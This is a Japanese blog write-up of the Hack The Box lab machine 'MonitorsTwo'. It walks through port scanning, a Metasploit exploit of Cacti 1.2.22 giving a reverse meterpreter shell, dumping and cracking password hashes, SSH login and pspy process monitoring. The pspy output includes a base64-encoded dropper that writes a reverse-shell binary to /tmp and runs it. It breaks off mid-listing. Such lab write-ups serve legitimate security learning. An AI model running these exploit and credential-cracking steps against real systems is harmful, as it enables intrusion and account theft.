初めに
どうも、クソ雑魚のなんちゃてエンジニアです。
本記事は Hack The Box(以下リンク参照) の「MonitorsTwo」にチャレンジした際の WriteUp になります。
※以前までのツールの使い方など詳細を書いたものではないのでご了承ください。
※悪用するのはやめてください。あくまで社会への貢献のためにこれらの技術を使用してください。法に触れるので。
Discovery
ポートスキャン
今回はRustScanで高速スキャンしてみた。
┌──(root㉿kali)-[~]
└─# rustscan -a 10.129.80.254 --top --ulimit 5000
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: https://discord.gg/GFrQsGy :
: https://github.com/RustScan/RustScan :
--------------------------------------
🌍HACK THE PLANET🌍
[~] The config file is expected to be at "/root/.rustscan.toml"
[~] Automatically increasing ulimit value to 5000.
Open 10.129.80.254:22
Open 10.129.80.254:80
[~] Starting Script(s)
[>] Script to be run Some("nmap -vvv -p {{port}} {{ip}}")
[~] Starting Nmap 7.93 ( https://nmap.org ) at 2023-05-01 00:55 EDT
Initiating Ping Scan at 00:55
Scanning 10.129.80.254 [4 ports]
Completed Ping Scan at 00:55, 0.30s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 00:55
Completed Parallel DNS resolution of 1 host. at 00:55, 0.00s elapsed
DNS resolution of 1 IPs took 0.01s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 00:55
Scanning 10.129.80.254 [2 ports]
Discovered open port 80/tcp on 10.129.80.254
Discovered open port 22/tcp on 10.129.80.254
Completed SYN Stealth Scan at 00:55, 0.31s elapsed (2 total ports)
Nmap scan report for 10.129.80.254
Host is up, received reset ttl 63 (0.27s latency).
Scanned at 2023-05-01 00:55:26 EDT for 0s
PORT STATE SERVICE REASON
22/tcp open ssh syn-ack ttl 63
80/tcp open http syn-ack ttl 63
Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.76 seconds
Raw packets sent: 6 (240B) | Rcvd: 3 (128B)
ポート22、80が公開されてそう。
実際に80番にアクセスしてみると以下のような画面が表示される。
デフォルトパスワード「admin:admin」で入ってみる。
ダメだった。んじゃ別ルートでやってみます。
Initial Access
CVE-2022-46169
BurpSuiteでレスポンスを確認していると以下の画像のようなVersion情報が記載されている箇所を発見した。
※BurpSuiteとはなんぞやは過去の記事を参考にして下さい。
CACTIのVersionが1.2.22とのことである。
この情報から脆弱性情報を検索してみると以下の記事がヒットする。
記事の内容を見てみるとDBにExploitがあるみたいなのでMetasploitを使用する。
(久しぶりにMetasploit触るなぁ)
Metasploit
起動してみる。
┌──(root㉿kali)-[~]
└─# msfconsole
Metasploit Park, System Security Interface
Version 4.0.5, Alpha E
Ready...
> access security
access: PERMISSION DENIED.
> access security grid
access: PERMISSION DENIED.
> access main security grid
access: PERMISSION DENIED....and...
YOU DIDN'T SAY THE MAGIC WORD!
YOU DIDN'T SAY THE MAGIC WORD!
YOU DIDN'T SAY THE MAGIC WORD!
YOU DIDN'T SAY THE MAGIC WORD!
YOU DIDN'T SAY THE MAGIC WORD!
YOU DIDN'T SAY THE MAGIC WORD!
YOU DIDN'T SAY THE MAGIC WORD!
=[ metasploit v6.3.4-dev ]
+ -- --=[ 2294 exploits - 1201 auxiliary - 409 post ]
+ -- --=[ 968 payloads - 45 encoders - 11 nops ]
+ -- --=[ 9 evasion ]
Metasploit tip: Use the edit command to open the
currently active module in your editor
Metasploit Documentation: https://docs.metasploit.com/
msf6 >
msf6 >
対象のモジュールを探してみる。
msf6 >
msf6 > search cacti
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/linux/http/cacti_unauthenticated_cmd_injection 2022-12-05 excellent Yes Cacti 1.2.22 unauthenticated command injection
1 exploit/unix/http/cacti_filter_sqli_rce 2020-06-17 excellent Yes Cacti color filter authenticated SQLi to RCE
2 exploit/unix/webapp/cacti_graphimage_exec 2005-01-15 excellent No Cacti graph_view.php Remote Command Execution
3 exploit/windows/http/hp_sitescope_runomagentcommand 2013-07-29 manual Yes HP SiteScope Remote Code Execution
Interact with a module by name or index. For example info 3, use 3 or use exploit/windows/http/hp_sitescope_runomagentcommand
あったので、使う!Optionで設定項目を確認しておく。
msf6 > use exploit/linux/http/cacti_unauthenticated_cmd_injection
[*] Using configured payload linux/x86/meterpreter/reverse_tcp
msf6 exploit(linux/http/cacti_unauthenticated_cmd_injection) >
msf6 exploit(linux/http/cacti_unauthenticated_cmd_injection) >
msf6 exploit(linux/http/cacti_unauthenticated_cmd_injection) >
msf6 exploit(linux/http/cacti_unauthenticated_cmd_injection) > options
Module options (exploit/linux/http/cacti_unauthenticated_cmd_injection):
Name Current Setting Required Description
---- --------------- -------- -----------
HOST_ID no The host_id value to use. By default, the module will try to bruteforce this.
LOCAL_DATA_ID no The local_data_id value to use. By default, the module will try to bruteforce this.
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT 8080 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
TARGETURI / yes The base path to Cacti
URIPATH no The URI to use for this exploit (default is random)
VHOST no HTTP server virtual host
X_FORWARDED_FOR_IP 127.0.0.1 yes The IP to use in the X-Forwarded-For HTTP header. This should be resolvable to a hostname in the poller
table.
When CMDSTAGER::FLAVOR is one of auto,certutil,tftp,wget,curl,fetch,lwprequest,psh_invokewebrequest,ftp_http:
Name Current Setting Required Description
---- --------------- -------- -----------
SRVHOST 0.0.0.0 yes The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen
on all addresses.
SRVPORT 8080 yes The local port to listen on.
Payload options (linux/x86/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
1 Automatic (Linux Dropper)
View the full module info with the info, or info -d command.
セッティングしてExploit実行。
msf6 exploit(linux/http/cacti_unauthenticated_cmd_injection) > set RPORT 80
RPORT => 80
msf6 exploit(linux/http/cacti_unauthenticated_cmd_injection) > set RHOSTS 10.129.80.254
RHOSTS => 10.129.80.254
msf6 exploit(linux/http/cacti_unauthenticated_cmd_injection) > set LHOST 10.10.14.3
LHOST => 10.10.14.3
msf6 exploit(linux/http/cacti_unauthenticated_cmd_injection) > exploit
[*] Started reverse TCP handler on 10.10.14.3:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. The target is Cacti version 1.2.22
[*] Trying to bruteforce an exploitable host_id and local_data_id by trying up to 500 combinations
[*] Enumerating local_data_id values for host_id 1
[+] Found exploitable local_data_id 6 for host_id 1
[*] Command Stager progress - 100.00% done (1118/1118 bytes)
[*] Exploit completed, but no session was created.
ステージャーで失敗してるかなぁ、CMDSTAGER::FLAVORのところかなぁ、設定箇所。
設定しなおしてみる。
msf6 exploit(linux/http/cacti_unauthenticated_cmd_injection) > set SRVHOST 10.10.14.3
SRVHOST => 10.10.14.3
msf6 exploit(linux/http/cacti_unauthenticated_cmd_injection) > set SRVPORT 8000
SRVPORT => 8000
msf6 exploit(linux/http/cacti_unauthenticated_cmd_injection) > options
Module options (exploit/linux/http/cacti_unauthenticated_cmd_injection):
Name Current Setting Required Description
---- --------------- -------- -----------
HOST_ID no The host_id value to use. By default, the module will try to bruteforce this.
LOCAL_DATA_ID no The local_data_id value to use. By default, the module will try to bruteforce this.
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS 10.129.80.254 yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
TARGETURI / yes The base path to Cacti
URIPATH no The URI to use for this exploit (default is random)
VHOST no HTTP server virtual host
X_FORWARDED_FOR_IP 127.0.0.1 yes The IP to use in the X-Forwarded-For HTTP header. This should be resolvable to a hostname in the poller
table.
When CMDSTAGER::FLAVOR is one of auto,certutil,tftp,wget,curl,fetch,lwprequest,psh_invokewebrequest,ftp_http:
Name Current Setting Required Description
---- --------------- -------- -----------
SRVHOST 10.10.14.3 yes The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen
on all addresses.
SRVPORT 8000 yes The local port to listen on.
Payload options (linux/x86/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 10.10.14.3 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
1 Automatic (Linux Dropper)
View the full module info with the info, or info -d command.
msf6 exploit(linux/http/cacti_unauthenticated_cmd_injection) >
msf6 exploit(linux/http/cacti_unauthenticated_cmd_injection) > run
[*] Started reverse TCP handler on 10.10.14.3:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. The target is Cacti version 1.2.22
[*] Trying to bruteforce an exploitable host_id and local_data_id by trying up to 500 combinations
[*] Enumerating local_data_id values for host_id 1
[+] Found exploitable local_data_id 6 for host_id 1
[*] Command Stager progress - 100.00% done (1118/1118 bytes)
[*] Sending stage (1017704 bytes) to 10.129.80.254
[*] Meterpreter session 3 opened (10.10.14.3:4444 -> 10.129.80.254:50302) at 2023-05-01 01:57:54 -0400
meterpreter >
meterpreter > pwd
/var/www/html
シェルを取得することに成功しました。(何故なのかは不明)
まぁWeb権限のシェルですよね。
Collection
このシェルで収集できる情報を集めてみる。
meterpreter > cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
あれ???/home階層のUserがいないな...
/home階層いってみようか...
cd /home
ls -tla
total 8
drwxr-xr-x 2 root root 4096 Mar 22 13:21 .
drwxr-xr-x 1 root root 4096 Mar 21 10:49 ..
何もない....dockerenvがある...
これはDockerコンテナ環境なのではないのか???
entrypoint.shのファイルがあったので、この中身を確認してみる。
entrypoint.sh
#!/bin/bash
set -ex
wait-for-it db:3306 -t 300 -- echo "database is connected"
if [[ ! $(mysql --host=db --user=root --password=root cacti -e "show tables") =~ "automation_devices" ]]; then
mysql --host=db --user=root --password=root cacti < /var/www/html/cacti.sql
mysql --host=db --user=root --password=root cacti -e "UPDATE user_auth SET must_change_password='' WHERE username = 'admin'"
mysql --host=db --user=root --password=root cacti -e "SET GLOBAL time_zone = 'UTC'"
fi
chown www-data:www-data -R /var/www/html
# first arg is `-f` or `--some-option`
if [ "${1#-}" != "$1" ]; then
set -- apache2-foreground "$@"
fi
exec "$@"
おお!?mysqlコマンドでDBアクセスできる感じですか?じゃぁ試してみます。
Credential Access
MySQL
まずはshow tables
mysql --host=db --user=root --password=root cacti -e "show tables"
Tables_in_cacti
aggregate_graph_templates
aggregate_graph_templates_graph
aggregate_graph_templates_item
aggregate_graphs
aggregate_graphs_graph_item
aggregate_graphs_items
automation_devices
automation_graph_rule_items
automation_graph_rules
automation_ips
automation_match_rule_items
automation_networks
automation_processes
automation_snmp
automation_snmp_items
automation_templates
automation_tree_rule_items
automation_tree_rules
cdef
cdef_items
color_template_items
color_templates
colors
data_debug
data_input
data_input_data
data_input_fields
data_local
data_source_profiles
data_source_profiles_cf
data_source_profiles_rra
data_source_purge_action
data_source_purge_temp
data_source_stats_daily
data_source_stats_hourly
data_source_stats_hourly_cache
data_source_stats_hourly_last
data_source_stats_monthly
data_source_stats_weekly
data_source_stats_yearly
data_template
data_template_data
data_template_rrd
external_links
graph_local
graph_template_input
graph_template_input_defs
graph_templates
graph_templates_gprint
graph_templates_graph
graph_templates_item
graph_tree
graph_tree_items
host
host_graph
host_snmp_cache
host_snmp_query
host_template
host_template_graph
host_template_snmp_query
plugin_config
plugin_db_changes
plugin_hooks
plugin_realms
poller
poller_command
poller_data_template_field_mappings
poller_item
poller_output
poller_output_boost
poller_output_boost_local_data_ids
poller_output_boost_processes
poller_output_realtime
poller_reindex
poller_resource_cache
poller_time
processes
reports
reports_items
sessions
settings
settings_tree
settings_user
settings_user_group
sites
snmp_query
snmp_query_graph
snmp_query_graph_rrd
snmp_query_graph_rrd_sv
snmp_query_graph_sv
snmpagent_cache
snmpagent_cache_notifications
snmpagent_cache_textual_conventions
snmpagent_managers
snmpagent_managers_notifications
snmpagent_mibs
snmpagent_notifications_log
user_auth
user_auth_cache
user_auth_group
user_auth_group_members
user_auth_group_perms
user_auth_group_realm
user_auth_perms
user_auth_realm
user_domains
user_domains_ldap
user_log
vdef
vdef_items
version
user_authが気になったのでこれを見ていく。show columns from user_authコマンド。
mysql --host=db --user=root --password=root cacti -e "show columns from user_auth"
Field Type Null Key Default Extra
id mediumint(8) unsigned NO PRI NULL auto_increment
username varchar(50) NO MUL 0
password varchar(256) NO
realm mediumint(8) NO MUL 0
full_name varchar(100) YES 0
email_address varchar(128) YES NULL
must_change_password char(2) YES NULL
password_change char(2) YES on
show_tree char(2) YES on
show_list char(2) YES on
show_preview char(2) NO on
graph_settings char(2) YES NULL
login_opts tinyint(3) unsigned NO 1
policy_graphs tinyint(3) unsigned NO 1
policy_trees tinyint(3) unsigned NO 1
policy_hosts tinyint(3) unsigned NO 1
policy_graph_templates tinyint(3) unsigned NO 1
enabled char(2) NO MUL on
lastchange int(11) NO -1
lastlogin int(11) NO -1
password_history varchar(4096) NO -1
locked varchar(3) NO
failed_attempts int(5) NO 0
lastfail int(10) unsigned NO 0
reset_perms int(10) unsigned NO 0
おっけ、Passwordが書いてあるみたいなのでこのテーブルからデータを持ってきます。
mysql --host=db --user=root --password=root cacti -e "select * from user_auth"
id username password realm full_name email_address must_change_password password_change show_tree show_list show_preview graph_settings login_opts policy_graphs policy_trees policy_hosts policy_graph_templates enabled lastchange lastlogin password_history locked failed_attempts lastfail reset_perms
1 admin $2y$10$IhEA.Og8vrvwueM7VEDkUes3pwc3zaBbQ/iuqMft/llx8utpR1hjC 0 Jamie Thompson admin@monitorstwo.htb on on on on on 2 1 1 1 1 on -1 -1 -1 0 0 663348655
3 guest 43e9a4ab75570f5b 0 Guest Account on on on on on 3 1 1 1 1 1 -1 -1 -1 0 0 0
4 marcus $2y$10$vcrYth5YcCLlZaPDj6PwqOYTw68W1.3WeKlBn70JonsdW/MhFYK4C 0 Marcus Brune marcus@monitorstwo.htb on on on on 1 1 1 1 1 on -1 -1 on 0 0 2135691668
クレデンシャルゲット!この情報をJohnさんに食わせて解析します。
John the Ripper
┌──(root㉿kali)-[~/work]
└─# john hash.txt --wordlist=./rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (bcrypt [Blowfish 32/64 X3])
Cost 1 (iteration count) is 1024 for all loaded hashes
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
funkymonkey (marcus)
1g 0:00:01:30 DONE (2023-05-01 02:34) 0.01108g/s 94.58p/s 94.58c/s 94.58C/s lilpimp..coucou
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
marcusのクレデンシャル情報が出てきたのでこの情報を使ってSSHのログインができるかどうか試してみる。
成功!これでUser権限は奪取できました。
Privilege Escalation
情報収集
sudo -l
marcus@monitorstwo:~$ sudo -l
[sudo] password for marcus:
Sorry, user marcus may not run sudo on localhost.
いい情報はない。
pspy
何かいいプロセス動いてないかなぁ~とか思いながらpspy動かします。
pspyの実行ファイルを以下のサイトから入手。64bit版をダウンロード。
起動。
marcus@monitorstwo:/tmp$ ./pspy64
pspy - version: v1.2.1 - Commit SHA: f9e6a1590a4312b9faa093d8dc84e19567977a6d
██▓███ ██████ ██▓███ ▓██ ██▓
▓██░ ██▒▒██ ▒ ▓██░ ██▒▒██ ██▒
▓██░ ██▓▒░ ▓██▄ ▓██░ ██▓▒ ▒██ ██░
▒██▄█▓▒ ▒ ▒ ██▒▒██▄█▓▒ ▒ ░ ▐██▓░
▒██▒ ░ ░▒██████▒▒▒██▒ ░ ░ ░ ██▒▓░
▒▓▒░ ░ ░▒ ▒▓▒ ▒ ░▒▓▒░ ░ ░ ██▒▒▒
░▒ ░ ░ ░▒ ░ ░░▒ ░ ▓██ ░▒░
░░ ░ ░ ░ ░░ ▒ ▒ ░░
░ ░ ░
░ ░
Config: Printing events (colored=true): processes=true | file-system-events=false ||| Scanning for processes every 100ms and on inotify events ||| Watching directories: [/usr /tmp /etc /home /var /opt] (recursive) | [] (non-recursive)
Draining file system events due to startup...
done
2023/05/01 08:01:26 CMD: UID=1000 PID=3066 | ./pspy64
2023/05/01 08:01:26 CMD: UID=0 PID=3010 |
2023/05/01 08:01:26 CMD: UID=0 PID=2927 |
2023/05/01 08:01:26 CMD: UID=1000 PID=2867 | -bash
2023/05/01 08:01:26 CMD: UID=1000 PID=2862 | sshd: marcus@pts/0
2023/05/01 08:01:26 CMD: UID=1000 PID=2752 | (sd-pam)
2023/05/01 08:01:26 CMD: UID=1000 PID=2748 | /lib/systemd/systemd --user
2023/05/01 08:01:26 CMD: UID=0 PID=2741 | sshd: marcus [priv]
2023/05/01 08:01:26 CMD: UID=33 PID=2672 | mysql --host=db --user=root --password=x xx
2023/05/01 08:01:26 CMD: UID=0 PID=2649 |
2023/05/01 08:01:26 CMD: UID=33 PID=2631 | more .dockerenv
2023/05/01 08:01:26 CMD: UID=33 PID=2618 | /tmp/vwgjY
2023/05/01 08:01:26 CMD: UID=33 PID=2613 |
2023/05/01 08:01:26 CMD: UID=33 PID=2612 | sh -c /usr/local/bin/php -q /var/www/html/script_server.php realtime `echo ZWNobyAtZW4gXFx4N2ZcXHg0NVxceDRjXFx4NDZcXHgwMVxceDAxXFx4MDFcXHgwMFxceDAwXFx4MDBcXHgwMFxceDAwXFx4MDBcXHgwMFxceDAwXFx4MDBcXHgwMlxceDAwXFx4MDNcXHgwMFxceDAxXFx4MDBcXHgwMFxceDAwXFx4NTRcXHg4MFxceDA0XFx4MDhcXHgzNFxceDAwXFx4MDBcXHgwMFxceDAwXFx4MDBcXHgwMFxceDAwXFx4MDBcXHgwMFxceDAwXFx4MDBcXHgzNFxceDAwXFx4MjBcXHgwMFxceDAxXFx4MDBcXHgwMFxceDAwXFx4MDBcXHgwMFxceDAwXFx4MDBcXHgwMVxceDAwXFx4MDBcXHgwMFxceDAwXFx4MDBcXHgwMFxceDAwXFx4MDBcXHg4MFxceDA0XFx4MDhcXHgwMFxceDgwXFx4MDRcXHgwOFxceGNmXFx4MDBcXHgwMFxceDAwXFx4NGFcXHgwMVxceDAwXFx4MDBcXHgwN1xceDAwXFx4MDBcXHgwMFxceDAwXFx4MTBcXHgwMFxceDAwXFx4NmFcXHgwYVxceDVlXFx4MzFcXHhkYlxceGY3XFx4ZTNcXHg1M1xceDQzXFx4NTNcXHg2YVxceDAyXFx4YjBcXHg2NlxceDg5XFx4ZTFcXHhjZFxceDgwXFx4OTdcXHg1YlxceDY4XFx4MGFcXHgwYVxceDBlXFx4MDNcXHg2OFxceDAyXFx4MDBcXHgxMVxceDVjXFx4ODlcXHhlMVxceDZhXFx4NjZcXHg1OFxceDUwXFx4NTFcXHg1N1xceDg5XFx4ZTFcXHg0M1xceGNkXFx4ODBcXHg4NVxceGMwXFx4NzlcXHgxOVxceDRlXFx4NzRcXHgzZFxceDY4XFx4YTJcXHgwMFxceDAwXFx4MDBcXHg1OFxceDZhXFx4MDBcXHg2YVxceDA1XFx4ODlcXHhlM1xceDMxXFx4YzlcXHhjZFxceDgwXFx4ODVcXHhjMFxceDc5XFx4YmRcXHhlYlxceDI3XFx4YjJcXHgwN1xceGI5XFx4MDBcXHgxMFxceDAwXFx4MDBcXHg4OVxceGUzXFx4YzFcXHhlYlxceDBjXFx4YzFcXHhlM1xceDBjXFx4YjBcXHg3ZFxceGNkXFx4ODBcXHg4NVxceGMwXFx4NzhcXHgxMFxceDViXFx4ODlcXHhlMVxceDk5XFx4YjJcXHg2YVxceGIwXFx4MDNcXHhjZFxceDgwXFx4ODVcXHhjMFxceDc4XFx4MDJcXHhmZlxceGUxXFx4YjhcXHgwMVxceDAwXFx4MDBcXHgwMFxceGJiXFx4MDFcXHgwMFxceDAwXFx4MDBcXHhjZFxceDgwPj4vdG1wL3Z3Z2pZIDsgY2htb2QgNzc3IC90bXAvdndnalkgOyAvdG1wL3Z3Z2pZICYgZWNobyA7IHJtIC1mIC90bXAvdndnalk= | base64 -d | /bin/bash`
2023/05/01 08:01:26 CMD: UID=33 PID=2166 | apache2 -DFOREGROUND
2023/05/01 08:01:26 CMD: UID=33 PID=2165 | apache2 -DFOREGROUND
2023/05/01 08:01:26 CMD: UID=33 PID=2164 | apache2 -DFOREGROUND
2023/05/01 08:01:26 CMD: UID=33 PID=2077 | apache2 -DFOREGROUND
2023/05/01 08:01:26 CMD: UID=0 PID=2003 |
2023/05/01 08:01:26 CMD: UID=0 PID=2002 |
2023/05/01 08:01:26 CMD: UID=33 PID=1568 | apache2 -DFOREGROUND
2023/05/01 08:01:26 CMD: UID=33 PID=1567 | apache2 -DFOREGROUND
2023/05/01 08:01:26 CMD: UID=33 PID=1566 | apache2 -DFOREGROUND
2023/05/01 08:01:26 CMD: UID=33 PID=1565 | apache2 -DFOREGROUND
2023/05/01 08:01:26 CMD: UID=33 PID=1564 | apache2 -DFOREGROUND
2023/05/01 08:01:26 CMD: UID=0 PID=1371 | apache2 -DFOREGROUND
2023/05/01 08:01:26 CMD: UID=0 PID=1348 | /usr/bin/containerd-shim-runc-v2 -namespace moby -id 50bca5e748b0e547d000ecb8a4f889ee644a92f743e129e52f7a37af6c62e51e -address /run/containerd/containerd.sock
2023/05/01 08:01:26 CMD: UID=0 PID=1333 | /usr/sbin/docker-proxy -proto tcp -host-ip 127.0.0.1 -host-port 8080 -container-ip 172.19.0.3 -container-port 80
2023/05/01 08:01:26 CMD: UID=999 PID=1255 | mysqld
2023/05/01 08:01:26 CMD: UID=0 PID=1232 | /usr/bin/containerd-shim-runc-v2 -namespace moby -id e2378324fced58e8166b82ec842ae45961417b4195aade5113fdc9c6397edc69 -address /run/containerd/containerd.sock
2023/05/01 08:01:26 CMD: UID=0 PID=940 | bpfilter_umh
2023/05/01 08:01:26 CMD: UID=33 PID=920 | nginx: worker process
2023/05/01 08:01:26 CMD: UID=33 PID=919 | nginx: worker process
2023/05/01 08:01:26 CMD: UID=0 PID=918 | nginx: master process /usr/sbin/nginx -g daemon on; master_process on;
2023/05/01 08:01:26 CMD: UID=0 PID=912 | sshd: /usr/sbin/sshd -D [listener] 0 of 10-100 startups
2023/05/01 08:01:26 CMD: UID=0 PID=905 | /sbin/agetty -o -p -- \u --noclear tty1 linux
2023/05/01 08:01:26 CMD: UID=0 PID=903 | /usr/bin/containerd
2023/05/01 08:01:26 CMD: UID=1 PID=899 | /usr/sbin/atd -f
2023/05/01 08:01:26 CMD: UID=0 PID=895 | /usr/sbin/cron -f
2023/05/01 08:01:26 CMD: UID=0 PID=890 | /usr/sbin/dockerd -H fd://
2023/05/01 08:01:26 CMD: UID=101 PID=850 | /lib/systemd/systemd-resolved
2023/05/01 08:01:26 CMD: UID=0 PID=784 | /usr/sbin/ModemManager
2023/05/01 08:01:26 CMD: UID=0 PID=726 | /usr/lib/udisks2/udisksd
2023/05/01 08:01:26 CMD: UID=0 PID=725 | /lib/systemd/systemd-logind
2023/05/01 08:01:26 CMD: UID=104 PID=723 | /usr/sbin/rsyslogd -n -iNONE
2023/05/01 08:01:26 CMD: UID=0 PID=722 | /usr/lib/policykit-1/polkitd --no-debug
2023/05/01 08:01:26 CMD: UID=0 PID=721 | /usr/sbin/irqbalance --foreground
2023/05/01 08:01:26 CMD: UID=103 PID=714 | /usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation --syslog-only
2023/05/01 08:01:26 CMD: UID=0 PID=713 | /usr/lib/accountsservice/accounts-daemon
2023/05/01 08:01:26 CMD: UID=0 PID=700 | /sbin/dhclient -1 -4 -v -i -pf /run/dhclient.eth0.pid -lf /var/lib/dhcp/dhclient.eth0.leases -I -df /var/lib/dhcp/dhclient6.eth0.leases eth0
2023/05/01 08:01:26 CMD: UID=0 PID=669 | /usr/bin/vmtoolsd
2023/05/01 08:01:26 CMD: UID=0 PID=668 | /usr/bin/VGAuthService
2023/05/01 08:01:26 CMD: UID=0 PID=649 | /sbin/auditd
2023/05/01 08:01:26 CMD: UID=102 PID=646 | /lib/systemd/systemd-timesyncd
2023/05/01 08:01:26 CMD: UID=0 PID=626 | /sbin/multipathd -d -s
2023/05/01 08:01:26 CMD: UID=0 PID=625 |
2023/05/01 08:01:26 CMD: UID=0 PID=624 |
2023/05/01 08:01:26 CMD: UID=0 PID=623 |
2023/05/01 08:01:26 CMD: UID=0 PID=622 |
2023/05/01 08:01:26 CMD: UID=0 PID=546 |
2023/05/01 08:01:26 CMD: UID=0 PID=501 | /lib/systemd/systemd-udevd
2023/05/01 08:01:26 CMD: UID=0 PID=468 | /lib/systemd/systemd-journald
2023/05/01 08:01:26 CMD: UID=0 PID=414 |
2023/05/01 08:01:26 CMD: UID=0 PID=413 |
2023/05/01 08:01:26 CMD: UID=0 PID=387 |
2023/05/01 08:01:26 CMD: UID=0 PID=361 |
2023/05/01 08:01:26 CMD: UID=0 PID=332 |
2023/05/01 08:01:26 CMD: UID=0 PID=331 |
2023/05/01 08:01:26 CMD: UID=0 PID=330 |
2023/05/01 08:01:26 CMD: UID=0 PID=300 |
2023/05/01 08:01:26 CMD: UID=0 PID=299 |
2023/05/01 08:01:26 CMD: UID=0 PID=298 |
2023/05/01 08:01:26 CMD: UID=0 PID=297 |
2023/05/01 08:01:26 CMD: UID=0 PID=296 |
2023/05/01 08:01:26 CMD: UID=0 PID=295 |
2023/05/01 08:01:26 CMD: UID=0 PID=294 |
2023/05/01 08:01:26 CMD: UID=0 PID=293 |
2023/05/01 08:01:26 CMD: UID=0 PID=289 |
2023/05/01 08:01:26 CMD: UID=0 PID=288 |
2023/05/01 08:01:26 CMD: UID=0 PID=287 |
2023/05/01 08:01:26 CMD: UID=0 PID=286 |
2023/05/01 08:01:26 CMD: UID=0 PID=285 |
2023/05/01 08:01:26 CMD: UID=0 PID=284 |
2023/05/01 08:01:26 CMD: UID=0 PID=282 |
2023/05/01 08:01:26 CMD: UID=0 PID=281 |
2023/05/01 08:01:26 CMD: UID=0 PID=280 |
2023/05/01 08:01:26 CMD: UID=0 PID=279 |
2023/05/01 08:01:26 CMD: UID=0 PID=278 |
2023/05/01 08:01:26 CMD: UID=0 PID=276 |
2023/05/01 08:01:26 CMD: UID=0 PID=274 |
2023/05/01 08:01:26 CMD: UID=0 PID=273 |
2023/05/01 08:01:26 CMD: UID=0 PID=272 |
2023/05/01 08:01:26 CMD: UID=0 PID=265 |
2023/05/01 08:01:26 CMD: UID=0 PID=263 |
2023/05/01 08:01:26 CMD: UID=0 PID=259 |
2023/05/01 08:01:26 CMD: UID=0 PID=254 |
2023/05/01 08:01:26 CMD: UID=0 PID=253 |
2023/05/01 08:01:26 CMD: UID=0 PID=252 |
2023/05/01 08:01:26 CMD: UID=0 PID=251 |
2023/05/01 08:01:26 CMD: UID=0 PID=250 |
2023/05/01 08:01:26 CMD: UID=0 PID=249 |
2023/05/01 08:01:26 CMD: UID=0 PID=248 |
2023/05/01 08:01:26 CMD: UID=0 PID=247 |
2023/05/01 08:01:26 CMD: UID=0 PID=246 |
2023/05/01 08:01:26 CMD: UID=0 PID=245 |
2023/05/01 08:01:26 CMD: UID=0 PID=244 |
2023/05/01 08:01:26 CMD: UID=0 PID=243 |
2023/05/01 08:01:26 CMD: UID=0 PID=242 |
2023/05/01 08:01:26 CMD: UID=0 PID=241 |
2023/05/01 08:01:26 CMD: UID=0 PID=240 |
2023/05/01 08:01:26 CMD: UID=0 PID=239 |
2023/05/01 08:01:26 CMD: UID=0 PID=238 |
2023/05/01 08:01:26 CMD: UID=0 PID=237 |
2023/05/01 08:01:26 CMD: UID=0 PID=236 |
2023/05/01 08:01:26 CMD: UID=0 PID=235 |
2023/05/01 08:01:26 CMD: UID=0 PID=234 |
2023/05/01 08:01:26 CMD: UID=0 PID=233 |
2023/05/01 08:01:26 CMD: UID=0 PID=232 |
2023/05/01 08:01:26 CMD: UID=0 PID=231 |
2023/05/01 08:01:26 CMD: UID=0 PID=230 |
2023/05/01 08:01:26 CMD: UID=0 PID=229 |
2023/05/01 08:01:26 CMD: UID=0 PID=228 |
